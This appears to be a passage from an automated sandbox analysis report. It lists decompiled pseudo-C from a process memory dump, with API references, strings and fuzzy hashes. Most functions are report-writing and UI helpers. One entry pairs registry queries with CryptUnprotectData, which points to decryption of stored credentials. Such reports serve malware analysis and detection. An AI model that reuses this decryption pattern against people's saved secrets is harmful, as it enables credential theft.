                                						memcpy(_t7, _t21, _t12);
                                						GlobalUnWire(_t16);
                                						_t10 = SetClipboardData(1, _t16);
                                						asm("sbb esi, esi");
                                						_t18 =  ~( ~_t10);
                                					}
                                				}
                                				CloseClipboard();
                                				return _t18;
                                 			}

                                APIs
                                • EmptyClipboard.USER32 ref: 004072BD
                                • strlen.MSVCRT ref: 004072CA
                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
                                • GlobalFix.KERNEL32(00000000), ref: 004072E6
                                • memcpy.MSVCRT ref: 004072EF
                                • GlobalUnWire.KERNEL32(00000000), ref: 004072F8
                                • SetClipboardData.USER32(00000001,00000000), ref: 00407301
                                • CloseClipboard.USER32 ref: 00407311
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                • String ID:
                                • API String ID: 2315226746-0
                                • Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                • Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
                                • Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                • Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 26%
                                			E0040A129(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                				signed int _v8;
                                				char* _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v24;
                                				signed int _v28;
                                				char _v48;
                                				char _v68;
                                				void _v96;
                                				signed int _t51;
                                				char* _t53;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				signed int _t66;
                                				intOrPtr _t80;
                                				intOrPtr* _t87;
                                				signed int _t91;
                                				void* _t92;
                                				void* _t93;
                                
                                				_t65 = __ebx;
                                				_t66 = 6;
                                				memcpy( &_v96, 0x4183e4, _t66 << 2);
                                				_t93 = _t92 + 0xc;
                                				asm("movsw");
                                				asm("movsd");
                                				asm("movsd");
                                				asm("movsd");
                                				asm("movsd");
                                				asm("movsw");
                                				asm("movsb");
                                				E004067EC(_a4, "<tr>");
                                				_t91 = 0;
                                				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                					do {
                                						_t51 =  *( *((intOrPtr*)(_t65 + 0x24)) + _t91 * 4);
                                						_v8 = _t51;
                                						_t53 =  &_v96;
                                						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t65 + 0x34)) + 4)) == 0) {
                                							_t53 =  &_v48;
                                						}
                                						_t87 = _a8;
                                						_v28 = _v28 | 0xffffffff;
                                						_v24 = _v24 | 0xffffffff;
                                						_v20 = _v20 | 0xffffffff;
                                						_v16 = _v16 & 0x00000000;
                                						_v12 = _t53;
                                						 *((intOrPtr*)( *_t65 + 0x30))(4, _t91, _t87,  &_v28);
                                						0x41241f(_v28,  &_v68);
                                						 *((intOrPtr*)( *_t87))(_v8,  *(_t65 + 0x4c));
                                						0x41244b();
                                						 *((intOrPtr*)( *_t65 + 0x48))( *((intOrPtr*)(_t65 + 0x50)), _t87, _v8);
                                						_t61 =  *((intOrPtr*)(_t65 + 0x50));
                                						_t80 =  *_t61;
                                						if(_t80 == 0 || _t80 == 0x20) {
                                							0x413cf4(_t61, "&nbsp;");
                                						}
                                						0x4124d4( *((intOrPtr*)(_t65 + 0x54)),  *((intOrPtr*)(_t65 + 0x50)));
                                						sprintf( *(_t65 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t65 + 0x54)));
                                						E004067EC(_a4,  *(_t65 + 0x4c));
                                						_t93 = _t93 + 0x20;
                                						_t91 = _t91 + 1;
                                					} while (_t91 <  *((intOrPtr*)(_t65 + 0x20)));
                                				}
                                				return E004067EC(_a4, 0x417de8);
                                 			}

                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • _mbscat.MSVCRT ref: 0040A1EE
                                • sprintf.MSVCRT ref: 0040A210
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileWrite_mbscatsprintfstrlen
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 1631269929-4153097237
                                • Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                • Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
                                • Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                • Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 15%
                                			E0040876F(signed short __ebx) {
                                				signed int _t17;
                                				void* _t18;
                                				intOrPtr _t19;
                                				intOrPtr _t23;
                                				signed int _t26;
                                				signed int _t27;
                                				intOrPtr _t28;
                                				void* _t30;
                                				intOrPtr _t31;
                                				intOrPtr _t34;
                                				signed short _t38;
                                				signed int _t39;
                                				signed int _t41;
                                				intOrPtr _t42;
                                				intOrPtr _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				intOrPtr _t47;
                                				intOrPtr _t48;
                                				void* _t50;
                                				int _t55;
                                				void* _t56;
                                				int _t66;
                                				void* _t67;
                                				void* _t68;
                                
                                				_t38 = __ebx;
                                				if( *0x41e448 == 0) {
                                					E004086ED();
                                				}
                                				_t39 =  *0x41e440; // 0xa
                                				_t17 = 0;
                                				if(_t39 <= 0) {
                                					L5:
                                					_t50 = 0;
                                				} else {
                                					while(1) {
                                						_t48 =  *0x41e438; // 0xc1bff0
                                						if(_t38 ==  *((intOrPtr*)(_t48 + _t17 * 4))) {
                                							break;
                                						}
                                						_t17 = _t17 + 1;
                                						if(_t17 < _t39) {
                                							continue;
                                						} else {
                                							goto L5;
                                						}
                                						goto L6;
                                					}
                                					_t46 =  *0x41e43c; // 0xc1c3f8
                                					_t50 =  *((intOrPtr*)(_t46 + _t17 * 4)) +  *0x41e430;
                                				}
                                				L6:
                                				if(_t50 != 0) {
                                					L22:
                                					_t18 = _t50;
                                				} else {
                                					if((_t38 & 0x00010000) == 0) {
                                						if( *0x41e200 == 0) {
                                							_t19 =  *0x41e450; // 0x1000
                                							_push(_t19 - 1);
                                							_push( *0x41e434);
                                							_push(_t38);
                                							_push(E004088C5());
                                							goto L16;
                                						} else {
                                							0x413d0c(0x41e308, "strings");
                                							_t30 = E00408BF9(_t38,  *0x41e434);
                                							_t56 = _t56 + 0x10;
                                							if(_t30 == 0) {
                                								L14:
                                								_t31 =  *0x41e450; // 0x1000
                                								_push(_t31 - 1);
                                								_push( *0x41e434);
                                								_push(_t38);
                                								goto L9;
                                							} else {
                                								_t55 = strlen( *0x41e434);
                                								if(_t55 == 0) {
                                									goto L14;
                                								}
                                							}
                                						}
                                					} else {
                                						_t34 =  *0x41e450; // 0x1000
                                						_push(_t34 - 1);
                                						_push( *0x41e434);
                                						_push(_t38 & 0x0000ffff);
                                						L9:
                                						_push( *0x41dbd4);
                                						L16:
                                						_t55 = LoadStringA();
                                						_t66 = _t55;
                                					}
                                					if(_t66 <= 0) {
                                						L21:
                                						_t18 = 0x417c88;
                                					} else {
                                						_t23 =  *0x41e444; // 0x64
                                						_t8 = _t55 + 2; // 0x66
                                						_t67 = _t23 + _t8 -  *0x41e448; // 0x8000
                                						if(_t67 >= 0) {
                                							goto L21;
                                						} else {
                                							_t41 =  *0x41e440; // 0xa
                                							_t68 = _t41 -  *0x41e44c; // 0x100
                                							if(_t68 >= 0) {
                                								goto L21;
                                							} else {
                                								_t42 =  *0x41e430; // 0xc13fe8
                                								_t50 = _t23 + _t42;
                                								_t10 = _t55 + 1; // 0x1
                                								memcpy(_t50,  *0x41e434, _t10);
                                								_t26 =  *0x41e440; // 0xa
                                								_t43 =  *0x41e444; // 0x64
                                								_t47 =  *0x41e43c; // 0xc1c3f8
                                								 *((intOrPtr*)(_t47 + _t26 * 4)) = _t43;
                                								_t27 =  *0x41e440; // 0xa
                                								_t44 =  *0x41e438; // 0xc1bff0
                                								 *(_t44 + _t27 * 4) = _t38;
                                								_t28 =  *0x41e444; // 0x64
                                								 *0x41e440 =  *0x41e440 + 1;
                                								 *0x41e444 = _t28 + _t55 + 1;
                                								if(_t50 != 0) {
                                									goto L22;
                                								} else {
                                									goto L21;
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _t18;
                                			}

                                APIs
                                • _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                • strlen.MSVCRT ref: 00408808
                                • LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                • memcpy.MSVCRT ref: 00408877
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                Strings
                                • strings, xrefs: 004087E0
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                • API String ID: 4036804644-4125592482
                                • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
                                • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,75D6F420,00000000), ref: 0040FD62
                                • RegCloseKey.ADVAPI32(?,?,75D6F420,00000000), ref: 0040FE4D
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memcpy.MSVCRT ref: 0040FDD4
                                • LocalFree.KERNEL32(?,?,00000000,?,?,75D6F420,00000000), ref: 0040FDE6
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,75D6F420,00000000), ref: 0040FE2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                • String ID:
                                • API String ID: 2372935584-3916222277
                                • Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                • Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
                                • Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                • Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E00408D47(struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                				int _v0;
                                				int _t25;
                                				char* _t31;
                                				intOrPtr _t32;
                                				intOrPtr _t33;
                                				int _t43;
                                				signed int _t45;
                                				signed int _t46;
                                
                                				_t46 = _t45 & 0xfffffff8;
                                				0x414060();
                                				_t25 = GetMenuItemCount(_a8);
                                				_t43 = 0;
                                				_v0 = _t25;
                                				if(_t25 <= 0) {
                                					L13:
                                					return _t25;
                                				} else {
                                					goto L1;
                                				}
                                				do {
                                					L1:
                                					memset( &_a53, 0, 0x1000);
                                					_t46 = _t46 + 0xc;
                                					_a40 =  &_a52;
                                					_a4.cbSize = 0x30;
                                					_a8 = 0x36;
                                					_a44 = 0x1000;
                                					_a20 = 0;
                                					_a52 = 0;
                                					_t25 = GetMenuItemInfoA(_a8, _t43, 1,  &_a4);
                                					if(_t25 == 0) {
                                						goto L12;
                                					}
                                					if(_a52 == 0) {
                                						L10:
                                						if(_a24 != 0) {
                                							_push(0);
                                							_push(_a24);
                                							_push(_a4.cbSize);
                                							_t25 = E00408D47();
                                							_t46 = _t46 + 0xc;
                                						}
                                						goto L12;
                                					}
                                					_t31 = strchr( &_a52, 9);
                                					if(_t31 != 0) {
                                						 *_t31 = 0;
                                					}
                                					_t32 = _a20;
                                					if(_a24 != 0) {
                                						if(_a12 == 0) {
                                							 *0x41e1fc =  *0x41e1fc + 1;
                                							_t33 =  *0x41e1fc; // 0x0
                                							_t32 = _t33 + 0x11558;
                                						} else {
                                							_t18 = _t43 + 0x11171; // 0x11171
                                							_t32 = _t18;
                                						}
                                					}
                                					_t25 = E00408D0F(_t32,  &_a52);
                                					goto L10;
                                					L12:
                                					_t43 = _t43 + 1;
                                				} while (_t43 < _v0);
                                				goto L13;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetstrchr
                                • String ID: 0$6
                                • API String ID: 2300387033-3849865405
                                • Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                • Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
                                • Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                • Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 90%
                                			E00407034(char* __ebx, intOrPtr _a4) {
                                				int _v8;
                                				char _v12;
                                				void _v1035;
                                				void _v1036;
                                				int _t28;
                                				int _t34;
                                				char* _t39;
                                				int _t42;
                                				void* _t43;
                                				void** _t45;
                                				void* _t46;
                                				void* _t47;
                                
                                				_t42 = 0;
                                				_v1036 = 0;
                                				memset( &_v1035, 0, 0x3ff);
                                				_t47 = _t46 + 0xc;
                                				 *__ebx = 0;
                                				_t45 = _a4 + 4;
                                				_v12 = 8;
                                				do {
                                					_push( *_t45);
                                					_push( *((intOrPtr*)(_t45 - 4)));
                                					sprintf( &_v1036, "%s (%s)");
                                					_t28 = strlen( &_v1036);
                                					_v8 = _t28;
                                					memcpy(_t42 + __ebx,  &_v1036, _t28 + 1);
                                					_t43 = _t42 + _v8 + 1;
                                					_t34 = strlen( *_t45);
                                					_v8 = _t34;
                                					memcpy(_t43 + __ebx,  *_t45, _t34 + 1);
                                					_t47 = _t47 + 0x30;
                                					_t45 =  &(_t45[2]);
                                					_t17 =  &_v12;
                                					 *_t17 = _v12 - 1;
                                					_t42 = _t43 + _v8 + 1;
                                				} while ( *_t17 != 0);
                                				_t39 = _t42 + __ebx;
                                				 *_t39 = 0;
                                				 *((char*)(_t39 + 1)) = 0;
                                				return __ebx;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpystrlen$memsetsprintf
                                • String ID: %s (%s)
                                • API String ID: 3756086014-1363028141
                                • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscat$memsetsprintf
                                • String ID: %2.2X
                                • API String ID: 125969286-791839006
                                • Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                • Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
                                • Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                • Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscpy$_mbscat
                                • String ID: eK@$memcpy$msvcrt.dll
                                • API String ID: 2404237207-527332992
                                • Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                • Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
                                • Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                • Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 66%
                                			E00408B7A(struct HWND__* _a4) {
                                				void _v4103;
                                				char _v4104;
                                
                                				0x414060();
                                				if( *0x41e200 != 0) {
                                					_v4104 = 0;
                                					memset( &_v4103, 0, 0x1000);
                                					_push( *0x41e348);
                                					sprintf(0x41e308, "dialog_%d");
                                					if(E00408C31(?str?,  &_v4104) != 0) {
                                						SetWindowTextA(_a4,  &_v4104);
                                					}
                                					return EnumChildWindows(_a4, E00408B1D, 0);
                                				}
                                				return 0x1004;
                                			}






                                APIs
                                • memset.MSVCRT ref: 00408BA5
                                • sprintf.MSVCRT ref: 00408BBA
                                  • Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
                                  • Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                  • Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91
                                • SetWindowTextA.USER32(?,?), ref: 00408BE1
                                • EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                • String ID: caption$dialog_%d
                                • API String ID: 2923679083-4161923789
                                • Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                • Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
                                • Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                • Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 67%
                                			E0040807D(char* __ebx, void* __eflags, void _a4, void _a8, intOrPtr _a12, short _a16) {
                                				void _v8;
                                				void _v12;
                                				char _v28;
                                				char _v116;
                                				char _v244;
                                				char _v248;
                                				char _v372;
                                				void _v627;
                                				char _v628;
                                				void* __edi;
                                				void* __esi;
                                				void* _t44;
                                				intOrPtr* _t50;
                                				int _t57;
                                				char* _t66;
                                				signed int _t69;
                                				intOrPtr _t75;
                                				int _t76;
                                				void* _t82;
                                				void* _t83;
                                
                                				_t66 = __ebx;
                                				_t76 = 0;
                                				memcpy( &_v12,  &_a8, 4);
                                				memcpy( &_v8,  &_a4, 4);
                                				E0040C905( &_v116);
                                				_push( &_v12);
                                				_t44 = 8;
                                				E0040C929(_t44,  &_v116);
                                				E0040C9C7(0,  &_v116,  &_v28);
                                				E00405235( &_v372);
                                				_t69 = 0;
                                				_t50 =  &_v248;
                                				do {
                                					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xf0)) =  *((intOrPtr*)(_t50 - 4));
                                					_t75 =  *_t50;
                                					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xec)) = _t75;
                                					_t69 = _t69 + 2;
                                					_t50 = _t50 - 8;
                                				} while (_t69 < 0x20);
                                				if(_a16 >= 8) {
                                					_v628 = 0;
                                					memset( &_v627, 0, 0xfe);
                                					_t81 = _a12;
                                					E00405641(_a12, _t69, __ebx,  &_v244);
                                					if(_a16 < 0x10) {
                                						__ebx[8] = 0;
                                					} else {
                                						E00405641(_t81 + 8,  &_v244,  &(__ebx[8]),  &_v244);
                                						__ebx[0x10] = 0;
                                					}
                                					_t57 = strlen(_t66);
                                					if(_t57 > 2) {
                                						asm("cdq");
                                						_t82 = (_t57 - _t75 >> 1) - 1 + _t66;
                                						0x413d0c( &_v628, _t82 + 2);
                                						0x413d0c(_t82,  &_v628);
                                					}
                                					_t76 = 1;
                                				}
                                				return _t76;
                                			}
























                                APIs
                                • memcpy.MSVCRT ref: 00408094
                                • memcpy.MSVCRT ref: 004080A3
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                  • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                • memset.MSVCRT ref: 00408120
                                • strlen.MSVCRT ref: 00408160
                                • _mbscpy.MSVCRT ref: 0040817F
                                • _mbscpy.MSVCRT ref: 0040818C
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpymemset$_mbscpy$strlen
                                • String ID:
                                • API String ID: 2712745786-0
                                • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040B8FA(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                				char _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				intOrPtr _v60;
                                				intOrPtr _v64;
                                				intOrPtr _v68;
                                				char _v72;
                                				void _v1095;
                                				char _v1096;
                                				void* __ebx;
                                				void* _t39;
                                				signed short _t52;
                                
                                				_v1096 = 0;
                                				memset( &_v1095, 0, 0x3ff);
                                				_v8 = 0x747874;
                                				_v72 = E0040876F(0x1f5);
                                				_v68 = 0x418600;
                                				_v64 = E0040876F(0x1f6);
                                				_v60 = 0x418600;
                                				_v56 = E0040876F(0x1f7);
                                				_v52 = 0x418600;
                                				_v48 = E0040876F(0x1f8);
                                				_v44 = 0x418608;
                                				_v40 = E0040876F(0x1f9);
                                				_v36 = 0x418608;
                                				_v32 = E0040876F(0x1fa);
                                				_v28 = 0x418618;
                                				_v24 = E0040876F(0x1fb);
                                				_v20 = 0x418620;
                                				_v16 = E0040876F(0x1fc);
                                				_v12 = 0x418620;
                                				E00407034( &_v1096,  &_v72);
                                				_t52 = 7;
                                				_t39 = E0040876F(_t52);
                                				_t23 =  &_v8; // 0x747874
                                				return E00406E60(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                			}


























                                APIs
                                • memset.MSVCRT ref: 0040B91A
                                  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                  • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                  • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                  • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
                                  • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
                                  • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
                                  • Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
                                  • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
                                  • Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD
                                  • Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2726666094-3614832568
                                • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
                                • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E00406CAA(void* __edx, struct HWND__* _a4) {
                                				int _v8;
                                				struct tagRECT _v24;
                                				int _t17;
                                				void* _t36;
                                				struct HDC__* _t38;
                                
                                				_t36 = __edx;
                                				_t38 = GetDC(0);
                                				_t17 = GetDeviceCaps(_t38, 8);
                                				_v8 = GetDeviceCaps(_t38, 0xa);
                                				ReleaseDC(0, _t38);
                                				GetWindowRect(_a4,  &_v24);
                                				asm("cdq");
                                				asm("cdq");
                                				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                			}









                                APIs
                                • GetDC.USER32(00000000), ref: 00406CB5
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
                                • ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
                                • GetWindowRect.USER32(?,?), ref: 00406CE2
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,77413BB0), ref: 00406D20
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CapsDeviceWindow$MoveRectRelease
                                • String ID:
                                • API String ID: 3197862061-0
                                • Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                • Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
